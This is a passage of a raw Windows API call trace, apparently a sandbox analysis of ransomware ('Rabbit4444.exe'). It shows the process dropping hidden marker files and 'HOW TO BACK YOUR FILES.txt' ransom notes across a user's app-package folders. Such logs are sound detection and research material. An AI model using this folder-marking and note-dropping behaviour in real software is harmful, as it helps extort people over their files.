(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.216] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.216] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.216] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.216] CloseHandle (hObject=0x2a0) returned 1 [0064.216] CloseHandle (hObject=0x2cc) returned 1 [0064.216] GetCurrentThreadId () returned 0xd98 [0064.216] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0064.216] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp" [0064.216] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124758 | out: hHeap=0xe0000) returned 1 [0064.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0064.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp" [0064.217] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\" [0064.217] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0064.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.218] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.220] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.221] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.221] CloseHandle (hObject=0x2cc) returned 1 [0064.222] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp") returned 84 [0064.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.222] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179e373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.222] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.222] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.222] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.222] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179e373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.222] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.222] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.222] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.222] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.222] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.222] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef99ac65, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef99ac65, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.222] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.222] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.222] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef99ac65, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef99ac65, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.222] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.222] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.223] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.223] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.223] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.223] CloseHandle (hObject=0x2a0) returned 1 [0064.223] CloseHandle (hObject=0x2cc) returned 1 [0064.224] GetCurrentThreadId () returned 0xd98 [0064.224] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0064.224] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory" [0064.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123200 | out: hHeap=0xe0000) returned 1 [0064.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0064.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory" [0064.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\" [0064.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0064.224] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.225] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.228] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.228] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.228] CloseHandle (hObject=0x2cc) returned 1 [0064.229] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory") returned 91 [0064.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.229] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179dc05, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0064.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.229] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.229] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.229] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179dc05, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef99ac65, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.229] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.229] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.229] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.230] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.230] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.230] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef99ac65, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef99ac65, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.230] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef99ac65, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef99ac65, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.230] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0064.230] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.231] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.231] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.231] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.231] CloseHandle (hObject=0x2a0) returned 1 [0064.231] CloseHandle (hObject=0x2cc) returned 1 [0064.231] GetCurrentThreadId () returned 0xd98 [0064.231] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0064.231] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies" [0064.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123380 | out: hHeap=0xe0000) returned 1 [0064.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0064.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies" [0064.231] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\" [0064.231] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0064.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.232] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.235] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.236] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.236] CloseHandle (hObject=0x2cc) returned 1 [0064.236] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies") returned 91 [0064.236] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179d576, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.237] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.237] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.237] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.237] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179d576, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.237] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.237] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.237] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.237] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.237] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.237] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef9c0e1e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef9c0e1e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.237] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.237] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.237] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef9c0e1e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef9c0e1e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9c0e1e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.237] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.237] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.238] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.241] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.242] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.242] CloseHandle (hObject=0x2a0) returned 1 [0064.242] CloseHandle (hObject=0x2cc) returned 1 [0064.242] GetCurrentThreadId () returned 0xd98 [0064.242] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0064.242] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache" [0064.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123080 | out: hHeap=0xe0000) returned 1 [0064.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0064.242] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache" | out: 